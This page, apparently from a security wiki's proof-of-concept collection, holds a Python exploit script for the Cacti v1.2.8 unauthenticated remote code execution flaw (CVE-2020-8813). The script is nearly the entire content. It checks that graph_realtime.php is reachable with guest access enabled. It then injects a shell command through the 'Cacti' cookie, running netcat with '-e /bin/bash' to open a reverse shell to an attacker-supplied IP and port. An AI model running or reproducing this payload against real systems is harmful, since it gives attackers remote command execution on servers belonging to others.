menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right POChouse-main chevron_right Cacti chevron_right Cacti v1.2.8 RCE(CVE-2020-8813) chevron_right Cacti-preauth-rce.py
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    Cacti-preauth-rce.py
    1.09 KB / 2021-06-28 05:31:32
        #!/usr/bin/python3
    
    # Exploit Title: Cacti v1.2.8 Unauthenticated Remote Code Execution
    # Date: 03/02/2020
    # Exploit Author: Askar (@mohammadaskar2)
    # CVE: CVE-2020-8813
    # Vendor Homepage: https://cacti.net/
    # Version: v1.2.8
    # Tested on: CentOS 7.3 / PHP 7.1.33
    
    import requests
    import sys
    import warnings
    from bs4 import BeautifulSoup
    from urllib.parse import quote
    
    warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
    
    
    if len(sys.argv) != 4:
        print("[~] Usage : ./Cacti-exploit.py url ip port")
        exit()
    
    url = sys.argv[1]
    ip = sys.argv[2]
    port = sys.argv[3]
    
    def send_exploit(url):
        payload = ";nc${IFS}-e${IFS}/bin/bash${IFS}%s${IFS}%s" % (ip, port)
        cookies = {'Cacti': quote(payload)}
        path = url+"/graph_realtime.php?action=init"
        req = requests.get(path)
        if req.status_code == 200 and "poller_realtime.php" in req.text:
            print("[+] File Found and Guest is enabled!")
            print("[+] Sending malicous request, check your nc ;)")
            requests.get(path, cookies=cookies)
        else:
            print("[+] Error while requesting the file!")
    
    send_exploit(url)
    
    links
    file_download